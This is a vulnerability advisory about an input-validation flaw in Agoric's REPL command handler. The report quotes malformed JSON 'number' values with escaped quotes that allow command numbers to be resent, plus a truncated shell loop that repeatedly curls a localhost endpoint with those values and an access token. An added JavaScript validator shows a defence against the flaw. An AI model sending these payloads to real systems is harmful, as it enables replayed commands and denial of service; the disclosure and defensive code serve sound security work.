Agoric: Improper Input Validation allows an attacker to "double spend" or "respend", violating the integrity of the message command history or causing DoS
News category: Vulnerabilities
Source: vulners.com
Summary: Improper Input Validation allows an attacker to "double spend" or "respend", violating the integrity of the message command history or causing DoS

Steps To Reproduce: I was curling random integers and found that I could do the following:

```json
{"type":"doEval","number":500,"body":"test"}
{"type":"doEval","number":501,"body":"test"}
{"type":"doEval","number":"501\"","body":"test"}
```

If I quote the integer and add an escaped `\"`, then I could send the number 500 again

```json
{"type":"doEval","number":500","body":"test"}
```

Let me know if this is an intended mechanism or not, but to be clear, here are the numbers:

502, 512, 522, "522\"", 502, 512, 522, "522\"", 502, 512, 522, "522\""

The test below is in the video:

```shell
# create an array of numbers I want to send twice
FAKE_INT=( 502 512 522 '"522\""' 512 522 '"522\""' 512 522 '"522\""' 512 522 '"522\""' 522 '"522\""' 502 )
REPL_STRING='GWhZto7qBseiU7ihRSQvNHORwx4FJ7xDztFsogKjP%2FwdN1q3rQWSreoGMUC%2FVql9'

# just keep cycling thru the numbers above
while true; do
  for FI in "${FAKE_INT[@]}"; do
    curl "http://127.0.0.1:8000/private/repl?accessToken=${REPL_STRING}" \
      -H 'Connection: keep-alive' \
      -H 'Pragma: no-cache' \
      -H 'Cache-Control: no-cache' \
      -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36' \
      -H 'Content-Type: application/json' \
      -H 'Accept: /' \
      -H 'Origin: http://127.0.0.1:8000'...
```

...
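A defensive check for this class of bug, as an added example (not Agoric's code and not part of the report): the handler accepts only a JSON integer for `number` and refuses any number that is not greater than the last one accepted. `CommandHistory`, `validateCommandNumber` and the strictly-increasing rule are assumptions made for illustration; the request bodies are the ones quoted in the report.

```javascript
// Added example, not Agoric's code. Assumption: each accepted command number
// must be strictly greater than the last one accepted in this session.
// Accept only a real JSON integer; a string such as "501\"" is rejected, never coerced.
function validateCommandNumber(raw) {
  return typeof raw === 'number' && Number.isSafeInteger(raw) && raw >= 0;
}

class CommandHistory {
  constructor() {
    this.highest = -1;        // highest command number accepted so far
    this.entries = new Map(); // command number -> body
  }

  // Parses one raw request body and returns { accepted, reason }.
  submit(rawBody) {
    let msg;
    try {
      msg = JSON.parse(rawBody);
    } catch (err) {
      return { accepted: false, reason: 'malformed JSON' };
    }
    if (msg === null || typeof msg !== 'object' || msg.type !== 'doEval') {
      return { accepted: false, reason: 'unsupported message' };
    }
    if (!validateCommandNumber(msg.number)) {
      return { accepted: false, reason: 'number is not a non-negative integer' };
    }
    if (msg.number <= this.highest) {
      return { accepted: false, reason: 'number already used' };
    }
    this.highest = msg.number;
    this.entries.set(msg.number, String(msg.body));
    return { accepted: true, reason: 'ok' };
  }
}

// Constructed replay of the request bodies quoted in the report.
function replayReportSequence() {
  const history = new CommandHistory();
  return [
    '{"type":"doEval","number":500,"body":"test"}',
    '{"type":"doEval","number":501,"body":"test"}',
    '{"type":"doEval","number":"501\\"","body":"test"}',
    '{"type":"doEval","number":500,"body":"test"}',
    '{"type":"doEval","number":500","body":"test"}',
  ].map((body) => history.submit(body).reason);
}
console.log(replayReportSequence());
```

With this check the quoted-string request is refused on type, so it cannot change what the server considers the current command number, and the repeated 500 is refused as already used.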